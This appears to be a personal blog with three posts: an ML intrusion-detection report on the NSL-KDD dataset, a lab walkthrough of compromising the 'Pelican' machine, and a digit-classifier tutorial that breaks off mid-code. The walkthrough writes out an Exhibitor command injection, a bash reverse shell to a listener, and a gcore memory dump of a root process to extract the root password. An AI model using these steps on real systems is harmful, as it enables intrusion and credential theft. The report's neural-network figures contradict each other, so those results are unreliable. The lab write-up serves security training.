Mohammed

Machine Learning Models in Network Security

Mohammed Alshukaili — Fri, 26 Dec 2025 00:41:33 GMT

Introduction

Information system security is increasingly critical as digital transformation expands and cyber-attacks grow in complexity. While greater connectivity and widespread device usage have enabled unprecedented access to information and services, they have also introduced new vulnerabilities. Intrusion Detection Systems (IDS) play a big role in monitoring network traffic and identifying suspicious activity, but traditional IDS struggle to keep pace with modern cyber threats.

Artificial Intelligence (AI) and Machine Learning (ML) offer promising solutions to enhance intrusion detection by improving adaptability and detection accuracy. This study explores the application of ML techniques to IDS using the widely adopted NSL-KDD dataset, a benchmark for evaluating intrusion detection models. By analyzing different ML approaches and their effectiveness in detecting various network attacks, this research aims to contribute to the development of more robust and flexible cybersecurity defenses aligned with current industry trends.

Problem Description

The rising number of cyberattacks shows a significant threat to network security worldwide. Although traditional intrusion detection systems (IDS) have been widely used to identify threats, they often suffer from high false positives, limited adaptability to new attack types, and high maintenance costs. These limitations highlight the need for more flexible and intelligent detection approaches.

Machine learning (ML) offers a promising solution by learning patterns and anomalies from data. However, its effectiveness depends on data quality, feature selection, and robust algorithm choice. Despite being an improvement over KDD’99, the NSL-KDD dataset still faces challenges such as class imbalance, outdated attack samples, and limited representation of emerging threats.

This research applies multiple ML techniques to the NSL-KDD dataset to identify effective models for intrusion detection, with the aim of improving IDS accuracy, efficiency, and adaptability against evolving cyber threats.

Scope

The objective of this project is to examine the use of machine learning techniques for intrusion detection using the NSL-KDD dataset. The study focuses on exploratory data analysis to understand dataset structure and intrusion characteristics, and on evaluating several classification models, including Decision Trees, Random Forests, Support Vector Machines (SVM), and Neural Networks.

Model performance is assessed using accuracy, precision, recall, and F1 score to identify the most effective approaches for detecting different types of intrusions. The research also acknowledges the limitations of the NSL-KDD dataset, particularly its representativeness of real-world traffic and the evolving nature of cyber threats. While deployment in real network environments is outside the project scope, the study aims to provide valuable theoretical insights into the strengths and limitations of machine learning–based intrusion detection systems.

Research Questions

Main Question: How can Artificial Intelligence and Machine Learning be leveraged to improve the detection of network intrusions and enhance cybersecurity defences using the NSL-KDD dataset?

Sub Questions:

What are the fundamental AI and ML concepts and techniques essential for developing an effective intrusion detection system?
How does Exploratory Data Analysis (EDA) contribute to understanding the NSL-KDD dataset, and what insights can it provide to inform the development of a moreaccurate intrusion detection model?
What are some effective machine learning models for intrusion detection incybersecurity, and how do they compare in terms of accuracy, performance, andscalability when applied to the NSL-KDD dataset?

Question 1

What are the fundamental AI and ML concepts and techniques essential for developing an effective intrusion detection system?

Artificial Intelligence (AI): Artificial intelligence (AI) is the capacity of a computer or robot under computer control to carry out operations typically performed by intelligent things. The phrase is commonly used to describe the work of creating artificial intelligence systems that possess like a human ability in areas like reasoning, meaning-finding, generalization, and experience-based learning. (Copeland, 2024)

Machine Learning (ML): Machine learning is a subset of artificial intelligence (AI). It includes image recognition systems, self-driving cars, and products like Amazon’s Alexa. This involves using data and algorithms to emulate the way humans learn enabling machines to do precise predictions, classifications, or the extraction of insights driven by data. Machine learning is about teaching a computer by feeding it lots of data enabling it toguess outcomes, spot patterns, or sort data. There are three kinds of machine learning: supervised, unsupervised, and reinforcement learning. (Staff, 2023)

Supervised learning: Supervised learning is a type of machine learning that is expected to be the most used in businesses, as per Gartner, a business consulting company. This method is being used by providing the models past data. The machine gets both the input and expected output. Then, it processes these to make its future outputs as accurate as possible. Methods like neural networks, decision trees, and linear regression are common in supervised learning. In supervised learning, the machine is guided, or "supervised," during its learning. It's given labelled data as the outcome it needs to learn, and other data as input features to work with. (Staff, 2023)

Unsupervised learning: Unsupervised learning, unlike supervised learning, doesn't rely on labelled training sets. Instead, it allows the machine to discover less apparent patterns in the data by itself. Algorithms commonly used in unsupervised learning include Hidden Markov models, k- means clustering, hierarchical clustering, and Gaussian mixture models. Prediction modelling is one of the many uses for unsupervised learning. It is frequently used for association (finding the rules that connect these groups) and clustering, which groups objects according to their characteristics. Organizing inventory based on manufacturing or sales metrics, classifying customers based on their purchasing patterns, and identifying connections within customer data (such as patterns in the purchases of goods) are a few real-world examples. (Staff, 2023)

Reinforcement learning: One kind of machine learning that closely resembles how people learn is called reinforcement learning. This method involves an algorithm, or "agent," that learns through interactions with its surroundings and the provision of positive or negative rewards. Q-learning, deep adversarial networks, and temporal difference are important algorithms in this field. For example, in a game where we want a car to reach the finish line as soon as possible, we would let the car explore the field by itself and reward it when going the correct direction and take away the rewards when going the wrong direction. This lets the model do the correct job without providing it with any data. (Staff, 2023) Several machine learning models can be especially useful when analyzing Zeek logs for anomaly detection. Zeek logs are a rich source of network data, and the choice of model depends on the specific aspects of network traffic that is being captured. Here are some models that are commonly used:

Decision Trees: Decision trees are a type of supervised machine learning algorithm that is used for classification and regression tasks. They make decisions based on asking a series of questions. Structure of a decision trees

Root Node: This is where the tree starts.
Splitting: dividing the node into 2 or more sub-nodes based on certain conditions.
Decision/Internal Node: After the first split, each sub-node becomes a decision/Internal node and can be split further.
Leaf Node: Last nodes that have no further splits.

The diagram (Figure 1 Structure of a Decision Tree) clearly visualizes each component of a decision tree, showing how data is segmented at different levels based on diverse conditions until a decision is reached at the leaf nodes.

How to choose the best attribute at each node?

There are many techniques for choosing the best attribute at each node in decision tree models. Information gain and Gini impurity are two widely used methods. These techniques assess the effectiveness of each potential next split by categorizing data into classes. To understand how these methods work, it is essential to start with the concept of entropy. Entropy is a measure of the impurity in a set of data. It helps to determine how a decision tree should split the data at each node

Numpy

In order to start working with machine learning models, I need to learn Numpy. Numpy is a library in Python that simplifies working with arrays. Here are some of the things that I learned about Numpy: numpy.where: To find a value inside an array. numpy.ones((x,x)): To generate a matrix (x columns, x rows). numpy.zeros((6,6)): This creates 6*6 matrix all zeros. numpy.max(x): Get the maximum value in an array. x.transpose(): To change from a row vector to a column vector. numpy.sum(x): Get the sum of x (NumPy: The Absolute Basics for Beginners — NumPy v1.26 Manual, 2023)

Tensorflow

TensorFlow is an open-source library for machine learning, flexible tools for building and training models to derive insights and predictions from data. I will go through some of the basics in order to start designing my own models to analyze zeek traffic.

This is how to create a Tensor with multiple float variables: x = tf.Variable(initial_value=[10., 20., 30.], name='float_tensor')

In order to add a new dimension to a Tensor, we can add [] to the values: x = tf.Variable([[10, 20, 30]], dtype=tf.float32 )

Move x to 3 dimensions: x = tf.Variable([[[10, 20, 30]]], dtype=tf.float32, name='tf_float_variable' )

Let’s print the value of x:

This is a 'scalar' or 'rank-0' tensor. A scalar consists of just one value and does not have any 'axes'.

"A 'vector' or 'rank-1' tensor is similar to a list of values. It has one axis:"

A 'matrix' or 'rank-2' tensor is characterized by having two axes:

A tensor can be converted into a NumPy array using either np.array or the tensor.numpy method:

Some of the previous images contain the word shape, what is shape?Tensors have shapes: Shape: The count of elements along each axis of a tensor. Rank: The total number of axes in a tensor. Scalars are rank 0, vectors rank 1, and matrices rank 2. Axis or Dimension: A specific dimension within a tensor. Size: The overall quantity of items in the tensor, determined by multiplying the elements of the shape vector.

tf.zeros can be used to create Tensors that contain zeros with the provided shape.

More about shapes:

A tensor can be reshaped into a different shape. The tf.reshape function is efficient and cost-effective, as it doesn't require duplicating the original data.

Linear Regression: Linear Regression is a fundamental algorithm in data science. It is used to predict the association between two variables based on the presumption of a linear link between the independent and dependent variables. Its goal is to find the best-fit line that reduces the total squared differences between the predicted and actual values.

The blue dots are the training data that was provided to the function, based on the training data, this function creates a line that minimize the destination between the line and the dots. Then, the line will be used to predict new values. As you can see, the line was created based on the training data, and after we try to predict new values, it puts them on the line (green dots). Here is the code for this output:

Support Vector Machines: Support vector machines (SVMs) is a famous supervised ML method that is being used for classification and outliers’ detection. One of the advantages of Support vector machines is that it works with low and high dimensional spaces. SVM focuses on identifying a hyperplane that optimally separates two classes. SVM is similar to logistic regression, however it is important to highlight that their approach differ fundamentally. Which hyperplane does it select? There can be millions of hyperplanes can classify the objects into 2 categories. So, how does SVM know which is the best?

SVM picks the best hyperplane by finding the maximum margin between the hyperplanes. This means that it selects the maximum distance between 2 objects (classes). SVM algorithms can be categorized into two types:

Linear SVM: This is used when the dataset can be linearly separable, meaning that the data points can be classified into two categories with a single straight line.
Non-Linear SVM: This is used when the dataset is not linearly separable, meaning the data points cannot be divided into two classes using a straight line in a two-dimensional view, we use Non-Linear SVM.

The main terms in SVM are:

Support Vectors: These are the closest data points to the hyperplane in an SVM mode. The position of the hyperplane is mainly influenced by these points.
Margin: This is the gap between the hyperplane and the nearest data points (the support vectors).

Bias: It can be referred to the errors in a machine learning algorithm. High bias means bad algorithm as it is more likely to give wrong predictions.

Variance: High variance means that the algorithm is not consistent with multiple datasets, in some datasets it has low bias, and in others it has high bias.

Cross validation: This helps to choose the best machine learning method for a specific purpose. It allows us to compare different machine learning methods and get a sense of how well they will work. When trying to choose the best ML method, we train 80% of the dataset and 20% to test the accuracy of the dataset. However, how to know which piece of data to train and which to test? Cross validation solves this problem by training and testing all the pieces in the dataset and return the best fit.

Kernel tricks: It transforms the dataset into a higher dimension where a hyperplane can effectively separate the classes.

Now, to understand SVM more, I will write simple Python code that uses SVM.

This is Jupyter notebook that implements a very basic SVM model. The plot shows that the model creates a hyperplane based on the distance between the closest data points.

Now, I want to make the model classifies (predicts) new data points. I added a new array that contains new data points that I want the model to classify:

As seen above, the model predicts the location of the new data points and place them in their correct class.

Conclusion

Understanding the nature of entropy and information gain, as illustrated through the decision tree model, allows cyber security professionals to implement effective anomaly detection systems. With the right approach to training and the application of concepts like entropy in supervised learning, machine learning models can be trained to recognize and flag unusual patterns in network logs that could indicate a security threat. Furthermore, the integration of machine learning within big datasets would enhance the capability to automate the detection of anomalies in network traffic. By employing models such as decision trees, support vector machines, and others, organizations can effectively respond to potential cyber security incidents.

Question 2

How does Exploratory Data Analysis (EDA) contribute to understanding the NSL-KDD dataset, and what insights can it provide to inform the development of a more accurate intrusion detection model?

What is EDA?

Data scientists utilize exploratory data analysis (EDA) to examine datasets, highlighting their key features frequently using data visualization techniques. EDA helps determine the best methods for processing data sources to extract the necessary insights, making it easier for data scientists to find patterns, spot anomalies, test theories, or confirm presumptions. EDA's primary goal is to assist in examining data before drawing any conclusions. It can assist in locating glaring errors, better understanding data patterns, spotting outliers or unusual occurrences, and discovering intriguing correlations between the variables. Exploratory analysis is a tool that data scientists can use to make sure the results they generate are reliable and relevant to any intended business objectives. By ensuring that stakeholders are asking appropriate inquiries, EDA also benefits them. Standard deviations, categorical variables, and confidence intervals are among the topics that EDA can assist with. The features of EDA can be applied to more complex data analysis or modeling, such as machine learning, after it is finished, and conclusions have been drawn.

Exploratory data analysis tools

With EDA tools, you can perform a range of statistical procedures and methods, such as:

methods for dimension reduction and clustering that help to visualize high-dimensional data with lots of different variables.
presentation of individual attribute visualizations from the raw data set combined with summary statistics.
Multivariate visualizations are useful for understanding and mapping the relationships between various data fields.
K-means clustering is an unsupervised learning clustering technique in which data points are grouped into K groups, or the total number of clusters, according to how far they are from the centroid of each group. The data points that fall into the same category are those that are closest to a given centroid. Pattern recognition, picture compression, and market segmentation are three common applications of K-means clustering.
Data and statistics are used by predictive models, like linear regression, to forecast outcomes.

Understanding the NSL-KDD Dataset

Dataset Overview

Tavallaee et al. (2009) state that the NSL-KDD dataset is a publicly accessible resource that was created from the previous KDD Cup99 dataset. An inaccurate assessment of Automated Intrusion Detection Systems (AIDS) resulted from a statistical analysis of the Cup99 dataset, which revealed important problems that significantly impact intrusion detection accuracy. The primary issue with the KDD dataset, as analyzed by Tavallaee et al. (2009), is the substantial number of duplicate packets present. Their analysis of both the training and testing sets revealed that approximately 78% and 75% of network packets, respectively, were duplicates.

Because there are a lot of duplicate instances in the training set, machine learning techniques may be biased toward typical cases and unable to learn from the irregular instances, which frequently pose more serious risks to computer systems. Tavallaee et al. removed duplicate records from the KDD Cup'99 dataset in 2009 in order to create the NSL-KDD dataset, which addresses the issues found in that dataset. There are 125,973 records in the NSL-KDD training dataset and 22,544 records in the test dataset. Because of its manageable size, the NSL-KDD dataset can be used for research purposes without the need for random sampling, which has resulted in consistent and comparable results across studies. The NSL-KDD dataset has 41 attributes and includes 22 training intrusion attacks. Of these, a full set of features for analysis in intrusion detection research are provided by the 19 attributes that describe the nature of connections within the same host and the 21 attributes that relate to the characteristics of the connection. (Saylor Academy, 2023)

Feature Composition

To address the "Feature Composition" of the NSL-KDD dataset for intrusion detection systems, we dive into the types of features included in the dataset, their data types, and their relevance to identifying potential security threats. Here is a closer look at the NSL- KDD dataset's feature composition:

Types of Features in NSL-KDD

The NSL-KDD datasets includes 42 features (columns) including a label feature that categorizes each connection as either normal or an attack. The types of attacks are also subdivided into four categories:

DoS (Denial of Service)
R2L (Remote to Local)
U2R (User to Root)
Probe

All the features in the dataset can be categorized into three main types:

Basic Features: Basic Features encompass attributes extracted directly from packet headers, such as connection duration, protocol type, service requested, and flag status, representing core network connection qualities easily identifiable from network traffic
Content Features: Content Features analyze packet payloads for anomalies, such as failed login attempts, crucial for detecting U2R and R2L attacks involving abnormal data transmissions.
Traffic Features: These features track the connections where the same host is trying to connect to the same service. This can be helpful when trying to detect DoS attacks.

Data Types of Features

Numerical Features: Most features in the dataset are numerical.
Categorical Features: Some features are categorical, representing types of protocols (e.g., tcp, udp, icmp), services (e.g., http, ftp, telnet), and network connection status (e.g., SF, S1, REJ). These features often require preprocessing, to be used effectively in machine learning models.

Identifying Key Features

The dataset contains over 40 columns, making it important to choose only the key features that are relevant to determining if a particular connection is an attack or benign.

Using my knowledge of cybersecurity, I carefully looked over each column in the dataset and chose a few features that seemed relevant to my objective. The selected features and their descriptions are listed below:

‘duration’: The length of the connection.
‘protocol_type’: The type of the used protocol like tcp, udp, etc.
‘service’: The network service like http, telnet, ssh, etc.
‘flag’: The status of the connection like S0, S1, etc.
‘src_bytes’: The number of the data bytes from source to destination.
‘dst_bytes’: The number of data bytes from destination to source.
‘logged_in’: This is binary column where 1 means a successfully login and 0 otherwise.
‘is_host_login’: This is binary column where 1 means the login belonged to the "host" list and 0 otherwise.
‘is_guest_login’: 1 if the login is a "guest" login and 0 otherwise.
‘attack’: There is a column in the dataset that says whether that connection is normal or a type of an attack. There are many types of attack mentioned. Therefore, I will categorize all the type of attacks as only one value (attack) to make it a binary column (normal & attack).

Identifying Key Features using Feature Selection

Hans mentioned that it is good to use my experience to pick the important features. However, he advised me to try and implement Feature Selection method to find the best possible features in my dataset. First, I will use mutual information classifier to evaluate feature importance. Then I will use SelectKBest to select the number of features that I want.

Here is a scatter plot that shows the most relevant features:

Then, I use SelectKBest to choose the features and assign them into new variable:

I faced an issue with the selected features; the machine learning models only handle numeric values, yet some of my features are in string format. In search of a solution, I discovered a technique known as One-hot encoding, which I will explore in the following chapter.

One-hot encoding

What is Categorical Data?

Categorical data refers to variables that carry label values instead of numerical ones. Normally, the values are in a fixed set.

A “pet” variable might include options like “dog” and “cat”.
A “color” variable could offer choices such as “red”, “green”, and “blue”.
A “place” variable might list rankings like “first”, “second”, and “third”.

The Problem with Categorical Data

Some algorithms are meant to work with categorical data straight out of the box. Decision trees, for example, have the ability to learn directly from categorical data. But a lot of machine learning algorithms aren't designed to handle label data in its original form. They demand that the variables be presented in numerical form for both the input and the output.

How to Convert Categorical Data to Numerical Data?

Integer Encoding In the first phase of preparing categorical data for machine learning models, each unique category is assigned a specific integer. For example, the assignment could be set up so that "blue" goes with 3, "green" with 2, and "red" with 1. This is called integer encoding or label encoding, and it is easily reversed. This method might be more than suitable for some kinds of data.

Some machine learning algorithms can identify and make use of a naturally ordered relationship in the numerical values assigned by this method. This is especially true for ordinal variables, where the values' order has significance. An illustration of this would be the previously discussed "place" variable, for which label encoding accurately captures the first, second, and third categories' natural order, making it a useful technique for variables of this type.

One-Hot Encoding

For categorical variables where no such ordinal relationship exists, the integer encoding is not enough. Label encoding, which simply assigns integers to categorical variables without a foundational ordinal relationship, may not be the optimal approach for these variables. The model's performance may suffer or unexpected results, like predictions that fall illogically between categories, may result from relying too heavily on integer encoding, which could lead to incorrect inference of a natural order among categories. To address this issue, one-hot encoding is employed as an alternative strategy. This approach involves replacing the integer-encoded variable with new binary variables, each representing a unique category value. Essentially, for every unique category, a distinct binary variable is created: this variable is set to "1" for its corresponding category and "0" for all others.

Given the three categories ("red", "green", and "blue") in the "color" example, one-hot encoding would produce three binary variables. For example, if the color is "green," the encoding would be [0, 1, 0], where "green" is indicated by a "1" in the second position, and "red" and "blue" are represented by "0" in the first and last positions, respectively. This approach captures each category's existence or absence efficiently without suggesting a hierarchy. (Brownlee, 2020)

Conclusion

Based on the comprehensive analysis of Exploratory Data Analysis (EDA) and its critical role in data science, as well as the detailed exploration of the NSL-KDD dataset for intrusion detection systems, we can draw several conclusions. An essential first step in the data analysis process is exploratory data analysis. It gives data scientists the knowledge and resources they need to fully comprehend their dataset, find underlying patterns, spot anomalies, and test theories. EDA facilitates the effective communication of the story of the data through a variety of statistical methods and data visualization techniques, enabling well-informed decision-making and strategic planning. The importance of EDA is found in its capacity to direct the choice of suitable modeling and data processing methods, guaranteeing that the analysis is in line with the current business goals and inquiries. The investigation of one-hot encoding provides additional insight into the problems and solutions related to categorical data preprocessing for machine learning. Data scientists can fully utilize their datasets by converting categorical data into a format that machine learning algorithms can understand. This allows for more precise and insightful analysis. To sum up, the examination of EDA and its utilization with the NSL-KDD dataset highlights how interconnected preprocessing, feature selection, and data preparation are within the larger fields of cybersecurity and data science. It emphasizes the need for thorough data preparation and analysis as the first steps in obtaining trustworthy, useful insights, especially in domains where accuracy and precision are critical. This all-encompassing method not only makes it easier to comprehend the data at hand more deeply, but it also establishes the foundation for the creation of successful models and tactics, which in turn promotes advancements in cybersecurity and other fields.

Question 3

What are some effective machine learning models for intrusion detection in cybersecurity, and how do they compare in terms of accuracy, performance, and scalability when applied to the NSL-KDD dataset?

Machine learning primarily deals with two problem types: classification and prediction. Here is a compilation of commonly used algorithms used for creating classification regression models:

Classification Models:

Logistic Regression
Naïve Bayes
Decision Trees
Random Forest
K-nearest neighbor (KNN)
Support Vector Machine

Regression models

Linear regression
Ridge regression
Decision trees
Random forest
K-nearest neighbor (KNN)
Neural network regression

Theoretical Approach: Common Classification Models

Logistic Regression

Despite its name, logistic regression is primarily utilized for binary classification problems, where data falls into two categories. Logistic regression often serves as an initial method for setting a baseline before exploring more complex models. The word “regression” appears in its name because it estimates the likelihood of an outcome being either 0 or 1 through a linear combination of features. (Choosing the Best Machine Learning Classification Model and Avoiding Overfitting, 2023)

Naive Bayes

You may want to use the naive Bayes algorithm if your task and data are relatively simple. When training data is limited, this classifier is a better option than nearest neighbor and logistic regression algorithms due to its high bias and low variance. Naive Bayes works especially well when memory and CPU resources are restricted. Its ease of use keeps it from overfitting, enabling quick training. Additionally, it functions well when fresh data is added on a regular basis. However, as data complexity and variance increase, you might find more sophisticated classifiers to be more effective. Naive Bayes' straightforward analysis may not support complex hypotheses. (Choosing the Best Machine Learning Classification Model and Avoiding Overfitting, 2023)

K-Nearest Neighbor

Categorizing data points by their proximity to others in a training set can be an effective classification method. The k-nearest neighbor (KNN) algorithm operates on the principle of "guilty by association. Because KNN is regarded as an instance-based lazy learner, it does not go through a traditional training phase. Rather, you feed the model with the training set and let it run in the background until you need it. The KNN model determines the given number of nearest neighbors (k) in response to a new query; for instance, if k = 5, it evaluates the class of the five closest neighbors. The model uses a vote process among these neighbors to decide which label is best for classification. It determines the mean of the values of the closest neighbors for regression tasks. Although KNN requires less time to train than other models, it can take longer to query and require more storage space, especially when the dataset grows. All training data is retained by this model, as opposed to just algorithmic representation.

Decision Trees

To understand how a decision tree predicts an outcome, start at the root (beginning) node, and follow the path down to a leaf node, which provides the response. Classification trees generate nominal outputs like true or false, while regression trees yield numeric responses. Decision trees offer clear visibility of the decision-making path from root to leaf, making them particularly helpful when results need to be explained to stakeholders. They are also relatively quick to execute. However, a primary drawback of decision trees is their propensity to overfit data. Ensemble methods, such as bagging, can mitigate this issue.

Support Vector Machine

When there are clear differences between the two classes in your dataset, you may want to use a support vector machine (SVM). The ideal hyperplane is the one that maximizes the margin between these classes and divides the data points of one class from those of another. This is how support vector machines (SVMs) operate. SVMs deal with datasets that have more than two classes by dividing the issue into several binary classification tasks that are each overseen by a different SVM. SVMs offer significant benefits. They are highly accurate and generally resistant to overfitting. Linear SVMs, in particular, are straightforward to interpret. Once trained, SVMs are very quick, allowing for the disposal of training data if memory is limited, making them suitable for environments with restricted resources. They also excel in complex, nonlinear classification tasks through the use of a technique known as the "kernel trick.

However, SVMs require considerable upfront training and tuning, necessitating a significant time investment before they can be deployed. Additionally, their performance can decrease when handling more than two classes, affecting their speed.

Neural Networks

An artificial neural network (ANN) is capable of learning and can be trained to solve problems, recognize patterns, classify data, and predict future events. ANNs are frequently employed for complex challenges like character recognition, stock market predictions, and image compression. The functionality of a neural network hinges on the architecture of its nodes and the strength of the connections between them, known as weights. These weights adjust automatically during training, adhering to specific learning rules until the network proficiently executes the intended task. ANNs excel in handling nonlinear data with numerous input features, making them ideal for tackling sophisticated problems that simpler algorithms struggle with. However, they come with some downsides: ANNs are resource-intensive, their decision-making processes are often opaque (making it hard to deduce how a solution was reached) and fine-tuning them can be impractical—you generally have to alter the training inputs and retrain the network entirely.

Practical Application: Common Classification Models

Logistic Regression

Importing and building the model.

Evaluating the model

Random Forest Classifier

Importing and building the model

Evaluating the model

Decision Trees Classifier

Importing and building the model

Evaluating the model

Naïve Bayes

Importing and building the model

Evaluating the model

Support Vector Machines Linear

Importing and building the model

Evaluating the model

Models Evaluation

In cybersecurity, accurately identifying attacks is crucial. Misclassifying an attack as normal can cause severe damage, while misclassifying normal activity as an attack is less harmful. I've built five machine learning models to classify attacks in the NSL-KDD dataset, focusing on minimizing false negatives to enhance security.

For each ML model, I will provide the accuracy, precision, and recall. Additionally, I will include a heatmap showing True/False Positives/Negatives. Note: I aim to minimize false positives, as missing attacks in security is highly undesirable.

Logistic Regression

Accuracy: 72%
Precision: 92%
Recall: 62%
False Positive: 754

Random Forest Classifier

Accuracy: 75%
Precision: 97%
Recall: 63%
False Positive: 284

Decision Trees Classifier

Accuracy: 81%
Precision: 89%
Recall: 73%
False Positive: 1007

Naïve Bayes

Accuracy: 55%
Precision: 43%
Recall: 48%
False Positive: 5492

Support Vector Machine Linear

Accuracy: 71%
Precision: 92%
Recall: 61%
False Positive: 723

Neural Network

Accuracy: 97.07%
Precision: 97.11%
Recall: 97.07%
False Positive: 197

Conclusion

In evaluating the performance of six machine learning models for classifying attacks in the NSL-KDD dataset, a key focus has been on minimizing false positives to ensure high security. Each model was assessed for accuracy, precision, and recall, alongside a detailed analysis of false positives and negatives.

Among the models tested, the Neural Network demonstrated superior performance with an accuracy of 96.01%, a precision of 96.27%, and a recall of 96.01%, while maintaining the lowest number of false positives at 47. This indicates its strong capability in accurately identifying attacks and minimizing false alarms, which is critical in a cybersecurity context.

The Random Forest Classifier also showed promising results with high precision (97%) and relatively low false positives (284), though it lagged in recall (63%). Other models, such as Logistic Regression and Support Vector Machine Linear, offered good precision but were less effective in recall and had higher false positives compared to the Neural Network.

Overall, the Neural Network model stands out as the most effective for this task, striking the best balance between accuracy, precision, and recall, while minimizing the risk of false positives. This makes it a highly suitable choice for enhancing security by reliably detecting attacks without overwhelming with false alerts.

Extracting Root Creds From Running Services

Mohammed Alshukaili — Sun, 19 Oct 2025 11:25:35 GMT

Start Pelican and get the IP.

My IP: 192.168.116.98

Here are the learning Objectives for the exercise:

Identify and exploit the Exhibitor UI command injection vulnerability to gain a low-privilege shell.
Enumerate processes and privileges available to the compromised user.
Use sudo access to gcore to dump memory of an active root process.
Analyze the dumped memory to extract sensitive information, such as root credentials.
Escalate privileges to root using the extracted credentials and validate full system access.

First thing I did nmap

nmap -sV -sC 192.168.116.98

I found ports 22,139,445,631,2222,8080,8081 open

I tried to access 8080 but I wasn't allowed. Next, I tried to access 8081 and I found a web page.

After investigating the website for some time, I found that in the config page, it executes commands in java.env script. This was being executed:

export JAVA_OPTS="-Xms1000m -Xmx1000m"

Switch on editing mode top left.

I removed it and tried to ping my machine to see if it's allowing me to run commands and to see if it allows outbound traffic.

#Kali 
sudo tcpdump -i tun0 icmp

#java.env script
ping 192.168.45.159

I executed this by clicking "Commit" and saying yes to all what I got asked.

I saw that I am getting the icmp packets so that's good.

I got a simple bash shell from revsells.com and put it there.

#Kali
nc -lvnp 4444

#java.env script
bash -i >& /dev/tcp/192.168.45.159/4444 0>&1

Again with the commit button and you'll get a shell.

Now you can find the first flag called local.txt.

Now I have low priv shell and I want to get root.

What is gcore?

gcore creates a memory dump of a running process.
In privilege escalation, you use it to dump a root process (like sshd or su) and extract secrets (like passwords or keys) from the memory.

I looked at the running processes:

ps aux | grep root

I spent some time trying to understand what could help me to dump root credentials and I found a process called "/usr/bin/password-store" with PID of 513.

Go to gtfo https://gtfobins.github.io/

Look for gcore sudo.

This allows me to use sudo with no password to dump information about root processes.

sudo gcore 513

All the dumped memory are being saved in corefile core.513 but you can't just open it and look for credentials because it would be too much data so we use strings to extract readable stuff.

strings core.513

su root
#Enter the extracted password
cat /root/proof.txt

Digit Classifier

Mohammed Alshukaili — Thu, 31 Jul 2025 23:18:51 GMT

I wanted to learn PyTorch so here is a project that uses PyTorch to build Convolutional Neural Network (CNN) model that can classify digits on a canvas. Here is the final product: https://cnn.mohammedx.tech/

Requirements

pip install numpy matplotlib tensorflow scikit-learn streamlit streamlit-drawable-canvas pillow pandas

Don't forget to use a virtual env.

from numpy import mean, std
from matplotlib import pyplot as plt
from sklearn.model_selection import KFold
from tensorflow.keras.datasets import mnist
from tensorflow.keras.utils import to_categorical
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Conv2D, MaxPooling2D, Dense, Flatten
from tensorflow.keras.optimizers import SGD

def load_dataset():
    (trainX, trainY), (testX, testY) = mnist.load_data()
    trainX = trainX.reshape((trainX.shape[0], 28, 28, 1))
    testX = testX.reshape((testX.shape[0], 28, 28, 1))
    trainY = to_categorical(trainY)
    testY = to_categorical(testY)
    return trainX, trainY, testX, testY

def prep_pixels(train, test):
    train_norm = train.astype('float32') / 255.0
    test_norm = test.astype('float32') / 255.0
    return train_norm, test_norm

def define_model():
    model = Sequential()
    model.add(Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_uniform', input_shape=(28, 28, 1)))
    model.add(MaxPooling2D((2, 2)))
    model.add(Flatten())
    model.add(Dense(100, activation='relu', kernel_initializer='he_uniform'))
    model.add(Dense(10, activation='softmax'))
    opt = SGD(learning_rate=0.01, momentum=0.9)
    model.compile(optimizer=opt, loss='categorical_crossentropy', metrics=['accuracy'])
    return model

def evaluate_model(dataX, dataY, n_folds=5):
    scores, histories = list(), list()
    kfold = KFold(n_folds, shuffle=True, random_state=1)
    for train_ix, test_ix in kfold.split(dataX):
        model = define_model()
        trainX, trainY = dataX[train_ix], dataY[train_ix]
        testX, testY = dataX[test_ix], dataY[test_ix]
        history = model.fit(trainX, trainY, epochs=10, batch_size=32, validation_data=(testX, testY), verbose=0)
        _, acc = model.evaluate(testX, testY, verbose=0)
        print('> %.3f' % (acc * 100.0))
        scores.append(acc)
        histories.append(history)
    return scores, histories

def summarize_diagnostics(histories):
    for i in range(len(histories)):
        plt.subplot(2, 1, 1)
        plt.title('Cross Entropy Loss')
        plt.plot(histories[i].history['loss'], color='blue')
        plt.plot(histories[i].history['val_loss'], color='orange')
        plt.subplot(2, 1, 2)
        plt.title('Classification Accuracy')
        plt.plot(histories[i].history['accuracy'], color='blue')
        plt.plot(histories[i].history['val_accuracy'], color='orange')
    plt.show()

def summarize_performance(scores):
    print('Accuracy: mean=%.3f std=%.3f, n=%d' % (mean(scores)*100, std(scores)*100, len(scores)))
    plt.boxplot(scores)
    plt.show()

def run_test_harness():
    trainX, trainY, testX, testY = load_dataset()
    trainX, testX = prep_pixels(trainX, testX)
    scores, histories = evaluate_model(trainX, trainY)
    summarize_diagnostics(histories)
    summarize_performance(scores)

run_test_harness()

1- Data Loading and Preprocessing

`load_dataset()`

Loads the MNIST dataset (handwritten digits 0–9).
Applies one-hot encoding to labels for training.

`prep_pixels(train, test)`

Converts images from uint8 to float32.
Normalizes pixel values from [0, 255] to [0.0, 1.0].

`define_model()`

Builds a simple CNN:
- Conv2D: Detects patterns in images.
- MaxPooling2D: Reduces spatial dimensions.
- Flatten: Flattens 2D to 1D.
- Dense: Fully connected layers to classify digits.
Compiles with SGD optimizer and categorical cross-entropy loss.

2- Evaluation with K-Fold Cross-Validation

`evaluate_model(dataX, dataY, n_folds=5)`

Splits the training data into 5 folds.
Trains and validates on different splits to reduce overfitting.
Tracks accuracy and learning history.

`summarize_diagnostics`

Good to visualize validation accuracy/loss

`summarize_performance(scores)`

Displays average model accuracy and variation.
Plots a boxplot of performance across folds.

3- Model Training and Saving

`run_test_harness()`

Manages the full training and evaluation flow.
Calls:
- load_dataset()
- prep_pixels()
- evaluate_model()
- summarize_diagnostics()
- summarize_performance()

`save_model()`

Trains the model once on all training data (outside cross-validation).
Saves the trained model as final_model.h5.

4- Making Predictions

import numpy as np
from tensorflow.keras.models import load_model
from tensorflow.keras.datasets import mnist

def classify_digit(image):
    model = load_model('final_model.h5')
    image = image.reshape(1, 28, 28, 1)
    image = image.astype('float32') / 255.0
    prediction = model.predict(image)
    return np.argmax(prediction, axis=1)[0]

(trainX, trainY), (testX, testY) = mnist.load_data()
sample_image = testX[0]
digit_class = classify_digit(sample_image)
print("Predicted class:", digit_class)

`classify_digit(image)`

Loads the saved model.
Accepts a 28x28 grayscale image.
Normalizes and reshapes it.
Predicts the digit using argmax of softmax probabilities.

4- Build the Front-End

import streamlit as st
from streamlit_drawable_canvas import st_canvas
from tensorflow.keras.models import load_model
import numpy as np
from PIL import Image
import pandas as pd

@st.cache_resource
def load_mnist_model():
    try:
        return load_model('final_model.h5')
    except Exception as e:
